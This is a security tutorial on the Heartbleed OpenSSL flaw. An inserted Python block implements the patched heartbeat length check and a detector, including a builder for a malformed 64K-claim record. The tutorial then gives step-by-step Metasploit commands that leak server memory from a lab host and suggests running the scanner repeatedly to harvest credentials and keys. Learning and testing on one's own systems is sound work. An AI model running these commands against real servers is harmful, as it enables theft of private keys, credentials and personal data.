The Heartbleed vulnerability enables a hacker to trick OpenSSL by sending a heartbeat request that carries a single byte of payload while claiming the payload is 64K bytes long. Vulnerable OpenSSL versions never compared that claimed length against the size of the record actually received, so the server, which is supposed to check the payload and echo it back, instead copies 64K bytes of whatever happens to be in its memory into the response and sends it back.
In this tutorial, I’ll show you a simple exploit for getting OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information.
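As an added example that is not part of the original tutorial or of the Metasploit module, the Python below implements the length check vulnerable OpenSSL was missing (the one added in 1.0.1g) and runs it over constructed heartbeat records. The function names, the record builder and the sample bytes are mine and are assumptions for illustration; the sample traffic is constructed, not captured.

```python
"""Length check for TLS heartbeat records (RFC 6520): the check missing from
OpenSSL before 1.0.1g (CVE-2014-0160, Heartbleed). Added example code."""
import struct
from typing import Optional

TLS_HEARTBEAT = 24            # TLS ContentType for heartbeat records
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520 section 4 requires at least 16 bytes of padding
HEADER_LEN = 1 + 2            # HeartbeatMessageType (1) + payload_length (2)


def parse_heartbeat_record(record: bytes) -> dict:
    """Parse one TLS record carrying a heartbeat message.

    Returns {'ok': True, ...} when the claimed payload_length fits inside the
    record that actually arrived (the fix shipped in OpenSSL 1.0.1g), or
    {'ok': False, 'reason': ...} when the record must be silently discarded.
    """
    if len(record) < 5:
        return {"ok": False, "reason": "truncated TLS record header"}
    content_type, _version, rec_len = struct.unpack("!BHH", record[:5])
    if content_type != TLS_HEARTBEAT:
        return {"ok": False, "reason": f"not a heartbeat record (type {content_type})"}
    body = record[5:5 + rec_len]
    if len(body) != rec_len:
        return {"ok": False, "reason": "record length field does not match bytes present"}
    # Check 1: the body must at least hold the 3-byte header plus minimum padding.
    if HEADER_LEN + MIN_PADDING > rec_len:
        return {"ok": False, "reason": "record too short for a heartbeat message"}
    hb_type = body[0]
    (payload_length,) = struct.unpack("!H", body[1:3])
    available = rec_len - HEADER_LEN - MIN_PADDING   # payload bytes really present
    # Check 2: the claimed payload plus padding must fit in the record. Vulnerable
    # OpenSSL skipped this and copied payload_length bytes out of process memory
    # into the response, which is the leak described in the text above.
    if HEADER_LEN + payload_length + MIN_PADDING > rec_len:
        return {"ok": False, "reason": "claimed payload_length exceeds record length",
                "claimed": payload_length, "available": available}
    payload = body[HEADER_LEN:HEADER_LEN + payload_length]
    return {"ok": True, "type": hb_type, "claimed": payload_length,
            "available": available, "payload": payload}


def build_heartbeat_record(payload: bytes, claimed_length: Optional[int] = None,
                           hb_type: int = HB_REQUEST) -> bytes:
    """Build a constructed heartbeat record for exercising the check above
    (hypothetical helper, not an OpenSSL or Metasploit function).

    claimed_length overrides the real payload length so a mismatched message,
    like the one-byte-but-claims-64K case in the text, can be fed to the parser.
    """
    if claimed_length is None:
        claimed_length = len(payload)
    message = struct.pack("!BH", hb_type, claimed_length) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0302, len(message)) + message


def flag_heartbeat_records(records) -> list:
    """Detection-style pass over captured records: skips non-heartbeat records and
    returns (index, reason) for every heartbeat record the length check rejects,
    which is the condition an IDS rule for this bug keys on."""
    flagged = []
    for i, rec in enumerate(records):
        if len(rec) >= 1 and rec[0] != TLS_HEARTBEAT:
            continue
        result = parse_heartbeat_record(rec)
        if not result["ok"]:
            flagged.append((i, result["reason"]))
    return flagged


if __name__ == "__main__":
    # Constructed sample traffic: one honest heartbeat and one that claims 64K
    # for a single-byte payload.
    samples = [
        build_heartbeat_record(b"hello"),
        build_heartbeat_record(b"x", claimed_length=0xFFFF),
    ]
    for idx, reason in flag_heartbeat_records(samples):
        print(f"record {idx} rejected: {reason}")
```

The two comparisons in parse_heartbeat_record mirror the patched OpenSSL logic: first that the record can hold a heartbeat header and padding at all, then that the claimed payload plus padding fits in what was received. A record that fails the second test is exactly the malformed request the module in this tutorial sends, and a patched server discards it without replying.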
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills. We only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.
Step 1: Update Metasploit
The first step is to update Metasploit to get the new auxiliary module for Heartbleed. Type:
- kali > msfupdate
Metasploit will then go through the long and slow process of updating its modules and framework. Be patient here; it takes a while.
When you are finally returned to the Kali prompt, the update has completed.
Step 2: Start Metasploit
Now, we need to start the Metasploit console. At any terminal prompt, type:
- kali > msfconsole
You should be greeted with a screen like that below.
Step 3: Find Heartbleed
Now, we need to find the new Heartbleed module. We can use the built-in search feature in Metasploit. Type:
- search heartbleed
This should bring up two auxiliary modules for Heartbleed. Select the first one as I’ve highlighted below.
Step 4: Use Auxiliary Module
Next, we need to load this auxiliary module (it is a scanner, not a payload). Simply type:
- use auxiliary/scanner/ssl/openssl_heartbleed
This will load the Heartbleed module.
Whenever I am using a new module, I like to look at the info page. Once we have loaded the module, type:
- msf > info
As we can see in the screenshot below, this reveals the options that need to be set in order to use this module and a description of the module.
Step 5: Set Options
Although this module has numerous options, the critical one is
RHOSTS (notice the plural here). Let’s set it to a target website I set
up on my network that is still vulnerable to Heartbleed.
- msf > set RHOSTS 192.168.1.169
Step 6: Run the Module
Finally, set the option “verbose” to “true”. This will provide us with verbose output.
- msf > set verbose true
And now let’s run it:
- msf > run
As you can see in the screenshot below, the server leaked about 64K bytes of what was in its memory.
Step 7: Success
If credentials, personally identifiable information (PII), or the
server’s private key had been in memory, they would have leaked out as
well. Of course, we could set up this Heartbleed scanner to run repeatedly to gather the info in memory on a continual basis, eventually gaining access to all the info that traversed RAM.